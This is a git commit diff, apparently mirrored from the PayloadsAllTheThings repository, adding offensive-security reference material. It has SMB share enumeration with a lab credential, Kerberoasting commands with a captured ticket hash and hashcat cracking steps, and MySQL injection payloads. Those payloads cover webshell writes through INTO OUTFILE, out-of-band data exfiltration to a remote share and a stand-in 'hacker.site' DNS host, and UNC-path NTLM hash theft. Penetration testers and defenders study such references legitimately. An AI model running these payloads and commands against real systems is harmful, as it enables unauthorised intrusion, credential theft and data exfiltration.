mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
AWS Pacu and sections + Kerberoasting details
This commit is contained in:
parent
82d4ff6c1d
commit
d5478d1fd6
@ -1,5 +1,12 @@
|
||||
# Amazon Bucket S3 AWS
|
||||
|
||||
## Tools
|
||||
|
||||
- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
|
||||
|
||||
|
||||
## AWS Configuration
|
||||
|
||||
Prerequisites, at least you need awscli
|
||||
|
||||
```bash
|
||||
@ -21,6 +28,8 @@ aws configure --profile nameofprofile
|
||||
|
||||
then you can use *--profile nameofprofile* in the aws command
|
||||
|
||||
## Open Bucket
|
||||
|
||||
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
|
||||
|
||||
```bash
|
||||
|
@ -82,6 +82,14 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
|
||||
## Open Shares
|
||||
|
||||
```powershell
|
||||
smbmap -H 10.10.10.100 # null session
|
||||
smbmap -H 10.10.10.100 -R # recursive listing
|
||||
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
ls # list files
|
||||
@ -333,8 +341,12 @@ TODO
|
||||
|
||||
### Kerberoast
|
||||
|
||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||
|
||||
Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
|
||||
```powershell
|
||||
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
|
||||
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
|
||||
|
||||
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
|
||||
|
||||
@ -345,7 +357,7 @@ active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=
|
||||
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
|
||||
```
|
||||
|
||||
Then crack the hash with hashcat or john
|
||||
Then crack the ticket with hashcat or john
|
||||
|
||||
```powershell
|
||||
hashcat -m 13100 -a 0 hash.txt crackstation.txt
|
||||
|
@ -1,12 +1,12 @@
|
||||
# MYSQL Injection
|
||||
|
||||
## MySQL
|
||||
## MYSQL
|
||||
|
||||
```sql
|
||||
# MYSQL Comment
|
||||
/* MYSQL Comment */
|
||||
/*! MYSQL Special SQL */
|
||||
/*!32302 10*/ Comment for MySQL version 3.23.02
|
||||
/*!32302 10*/ Comment for MYSQL version 3.23.02
|
||||
```
|
||||
|
||||
## Detect columns number
|
||||
@ -21,7 +21,7 @@ order by 3
|
||||
order by XXX
|
||||
```
|
||||
|
||||
## MySQL Union Based
|
||||
## MYSQL Union Based
|
||||
|
||||
```sql
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
@ -30,7 +30,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
|
||||
## MySQL Error Based - Basic
|
||||
## MYSQL Error Based - Basic
|
||||
|
||||
```sql
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
@ -109,7 +109,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
## MySQL DIOS - Dump in One Shot
|
||||
## MYSQL DIOS - Dump in One Shot
|
||||
|
||||
```sql
|
||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||
@ -126,4 +126,31 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
|
||||
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
|
||||
```
|
||||
|
||||
## References
|
||||
## MYSQL Out of band
|
||||
|
||||
```powershell
|
||||
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
|
||||
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
|
||||
```
|
||||
|
||||
DNS exfiltration
|
||||
|
||||
```sql
|
||||
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
|
||||
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
|
||||
```
|
||||
|
||||
UNC Path - NTLM hash stealing
|
||||
|
||||
```sql
|
||||
select load_file('\\\\error\\abc');
|
||||
select load_file(0x5c5c5c5c6572726f725c5c616263);
|
||||
select 'osanda' into dumpfile '\\\\error\\abc';
|
||||
select 'osanda' into outfile '\\\\error\\abc';
|
||||
load data infile '\\\\error\\abc' into table database.table_name;
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
|
Loading…
Reference in New Issue
Block a user